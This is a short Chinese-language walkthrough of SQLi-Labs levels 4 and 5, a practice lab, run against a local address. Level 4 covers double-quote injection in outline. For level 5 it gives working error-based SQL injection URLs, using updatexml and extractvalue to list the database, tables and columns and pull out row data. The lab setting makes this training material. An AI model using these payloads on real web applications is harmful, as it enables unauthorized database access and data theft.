SqliLabs Less4-5

 第四关

 

双引号注入

1.判断注入点

http://192.168.0.105:82/Less-4/?id=1" 返回错误

 

http://192.168.0.105:82/Less-4/?id=1")  --+返回正常

 

2.判断列数，列数为3

 

3.爆库

 

4.爆表

 

5.爆列

 

6.爆数据

 

第五关

1.判断注入点，使用联合注入没反应，采用报错注入updatexml(xml文档名称，xml文档路径，替换的数据)或者extractvalue（xml文档名称，xml文档路径）

 

 2.判断列数 

 从order by 1开始，order by 4 时显错，列数为3

3.爆库

http://192.168.0.105:82/Less-5/?id=-1'  and updatexml(1,concat(0x7e,database()),2)--+

 4.爆表

http://192.168.0.105:82/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),2) --+

使用extractvalue函数示范

http://192.168.0.105:82/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+

5.爆列

http://192.168.0.105:82/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name = 'emails' )),2) --+

  http://192.168.0.105:82/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+

 6.爆数据

http://192.168.0.105:82/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select concat(id,email_id) from emails limit 6,1)),3) --+

   当数据过多时使用limit 0，1  （limit 0,1表示从第0个数据开始，只读取一个),但需要把group_concat(表示将group by产生的同一个分组中的值连接起来，返回一个字符串结果)改为concat（表示连接函数，将多个字符串连接成一个字符串）